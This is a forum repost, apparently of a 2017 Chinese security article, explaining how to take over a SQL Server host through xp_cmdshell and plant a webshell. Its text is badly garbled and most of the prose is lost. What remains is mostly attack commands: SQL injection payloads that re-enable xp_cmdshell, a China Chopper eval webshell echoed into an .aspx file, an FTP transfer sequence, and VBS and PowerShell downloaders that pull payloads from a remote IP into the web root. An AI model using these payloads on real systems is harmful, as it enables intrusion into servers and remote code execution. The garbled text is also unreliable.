搜索

[20870] 2017-08-21_sqlserver利用xp_cshell以及远程文件下载拿webshell方式

文档创建者:s7ckTeam
浏览次数:8
最后更新:2025-01-18
2017-08-21_sqlserver利用xp_cmdshell以及远程文件下载拿webshell方式 s q l s e r v e r   x p _ c m d s h e l l w e b s h e l l   l e m o n   L e m o n S e c   2 0 1 7 - 0 8 - 2 1 x p _ c m d s h e l l a n d   1 = ( S e l e c t   c o u n t ( * )   f r o m   m a s t e r . . s y s o b j e c t s   w h e r e   x t y p e = ' X '   a n d   n a m e = ' x p _ c m d s h e l l ' ) - - x p _ c m d s h e l l ; e x e c   s p _ d r o p e x t e n d e d p r o c   ' x p _ c m d s h e l l ' - - x p _ c m d s h e l l ; E X E C   s p _ a d d e x t e n d e d p r o c   x p _ c m d s h e l l   , @ d l l n a m e   = ' x p l o g 7 0 . d l l '   - - ; E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ; R E C O N F I G U R E ; E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' ,   1 ; R E C O N F I G U R E - -   / / 1 0 .   s p _ a d d e x t e n d e d p r o c   (   m s s q l s y s t e m r e s o u r c e     s y s )   E X E C U T E   x p l o g 7 0 . d l l   x p l o g 7 0 . d l l ; e x e c   s p _ a d d e x t e n d e d p r o c   x p _ c m d s h e l l , c : x p l o g 7 0 . d l l x p _ c m d s h e l l ; e x e c   m a s t e r . . x p _ c m d s h e l l   " "   - - x p _ c m d s h e l l   w e b s h e l l x p _ c m d s h e l l c m d     d i r   / s   c : d e f a u l t . a s p x           C d e f a u l t . a s p x                       w e b e x e c   m a s t e r . . x p _ c m d s h e l l   " d i r   / s   f : d e f a u l t . a s p x "
s h e l l     2 2 . t x t 1 1 1 1 e x e c   m a s t e r . . x p _ c m d s h e l l   " e c h o   1 1 1 1   > >     f : w w w r o o t L o t t e r y W e b 2 2 . t x t "
< > ^ e x e c   m a s t e r . . x p _ c m d s h e l l   ' e c h o   ^ < % @   P a g e   L a n g u a g e = " J s c r i p t " % ^ > ^ < % e v a l ( R e q u e s t . I t e m [ " c h o p p e r " ] , " u n s a f e " ) ; % ^ > > > f : w w w r o o t L o t t e r y W e b 2 2 . a s p x ' e x e c   m a s t e r . . x p _ c m d s h e l l   ' t y p e   f : w w w r o o t L o t t e r y W e b 2 2 . a s p x '
w e b 访 2 2 . a s p x 访 w a f w e b s h e l l s h e l l     w i n d o w s   c m d   f t p     f t p , 1 . - - F T P   O R   c m d - - > f t p   2 . o p e n   q i n t . i t h o t . n e t     / * " f t p   q i n t . i t h o t . n e t " F T P 2 1 2 1 2 1 2 1 2 1 o p e n   q i n t . i t h o t . n e t   2 1 2 1 * /     3 . u s e r n a m e : u s e r n a m e       / * * /     4 . p a s s w o r d : u s e r 1 2 3 4       / * u s e r   * /     5 . p u t   i 0 0 1 . j p g   / * ( d : q i n t ) i 0 0 1 . j p g F T P " m p u t   * . * " F T P * /   6 . m p u t   * . h t m h t m 7 . g e t   d 1 2 3 . j p g   / * F T P d 1 2 3 . j p g ( d : q i n t ) " m g e t   * . * " d : q i n t * /   8 . m g e t   * . h t m h t m   9 . d e l e t e   * . *  
/ * q i n t * /   V B S V B S M i c r o s o f t   V i s u a l   B a s i c   S c r i p t   E d i t o n B A S I C V B S V i s u a l   B a s i c e c h o   i L o c a l = L C a s e ( W s c r i p t . A r g u m e n t s ( 1 ) )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s                                                                                         / /     e x e c m a s t e r . . x p _ c m d s h e l l   ' e c h o   i L o c a l = L C a s e ( W s c r i p t . A r g u m e n t s ( 1 ) )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s ' e c h o   i R e m o t e = L C a s e ( W s c r i p t . A r g u m e n t s ( 0 ) )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   w s c r i p t . e c h o   " [ ! ] G E T   " , i R e m o t e   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s e t   x P o s t = C r e a t e O b j e c t ( " M i c r o s o f t . X M L H T T P " )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   x P o s t . O p e n   " G E T " , i R e m o t e , 0   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   x P o s t . S e n d ( )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   O n   E r r o r   R e s u m e   N e x t   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s e t   s G e t = C r e a t e O b j e c t ( " A D O D B . S t r e a m " )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s G e t . M o d e = 3   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s G e t . T y p e = 1   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s G e t . O p e n ( )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s G e t . W r i t e   x P o s t . R e s p o n s e B o d y   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s G e t . S a v e T o F i l e   i L o c a l , 2   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s
U s a g e : c s c r i p t   / / n o l o g o   f : w w w r o o t L o t t e r y W e b w g e t . v b s   h t t p : / / 1 3 9 . 1 9 9 . 1 0 9 . 1 8 4 / 1 . t x t   f : w w w r o o t L o t t e r y W e b 1 1 . a s p x h t t p : / / 1 3 9 . 1 9 9 . 1 0 9 . 1 8 4 / 1 . t x t   v b s e x e c   m a s t e r . . x p _ c m d s h e l l   ' c s c r i p t   / / n o l o g o   f : w w w r o o t L o t t e r y W e b w g e t . v b s h t t p : / / 1 3 9 . 1 9 9 . 1 0 9 . 1 8 4 / 1 . t x t     f : w w w r o o t L o t t e r y W e b 1 1 . a s p x '
1 1 . a s p x e x e c   m a s t e r . . x p _ c m d s h e l l   ' t y p e     f : w w w r o o t L o t t e r y W e b 1 1 . a s p x ' 1 1 . a s p x
s h e l l p o w e r s h e l l P o w e r S h e l l   使   . N E T   F r a m e w o r k     W i n d o w s     W i n d o w s   S c r i p t   H o s t   I m p o r t - M o d u l e   B i t s T r a n s f e r                                                                                                     / / e x e c   m a s t e r . . x p _ c m d s h e l l   ' e c h o   I m p o r t - M o d u l e   B i t s T r a n s f e r > > f : w w w r o o t L o t t e r y W e b 3 3 3 . p s 1 ' $ u r l = ' h t t p : / / w w w / b a i d u . c o m / l o g o . p n g '                                                                         / / e x e c   m a s t e r . . x p _ c m d s h e l l   ' e c h o   $ u r l = " h t t p : / / 1 3 9 . 1 9 9 . 1 0 9 . 1 8 4 / 2 . t x t " > > f : w w w r o o t L o t t e r y W e b 3 3 3 . p s 1 ' S t a r t - B i t s T r a n s f e r   $ u r l   d : l o g o . p n g                                                                                     / / e x e c   m a s t e r . . x p _ c m d s h e l l   ' e c h o   S t a r t - B i t s T r a n s f e r   $ u r l f : w w w r o o t L o t t e r y W e b 3 3 3 . a s p x   > > f : w w w r o o t L o t t e r y W e b 3 3 3 . p s 1 '                                                                                                                                                                                                                                                                                                                                                                                                                                                                       3 3 3 . a s p x         便     w e b s h e l l . a s p x p o w e r s h e l l                                                                                                                                         / / e x e c   m a s t e r . . x p _ c m d s h e l l   ' p o w e r s h e l l   f : w w w r o o t L o t t e r y W e b 3 3 3 . p s 1 ' 2 2 2 . p s l ,   3 3 3 . p s l 3 3 3 . p s l 3 3 3 . p s l

* 使 P o w e r s h e l l W i n d o w s   P o w e r S h e l l   ( C )   2 0 0 9   M i c r o s o f t   C o r p o r a t i o n P S   C : W i n d o w s s y s t e m 3 2 >   D : W o r k s h o p P o w e r s h e l l S p r i n k l e r s r c S c r i p t s S P R I N K L E . p s 1   D : W o r k s h o p P o w e r s h e l l S p r i n k l e r s r c S c r i p t s S P R I N K L E . p s 1
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理